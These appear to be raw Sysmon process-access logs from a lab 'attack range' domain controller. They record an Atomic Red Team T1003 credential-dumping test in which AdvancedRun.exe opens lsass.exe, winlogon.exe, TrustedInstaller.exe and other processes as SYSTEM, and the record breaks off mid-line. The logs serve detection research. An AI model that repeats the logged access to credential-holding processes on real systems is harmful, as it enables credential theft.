17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003953105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003953104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003953103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003953100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003953099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953095Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED58-61EA-7D03-000000002702}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED58-61EA-7D03-000000002702}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953091Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953090Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\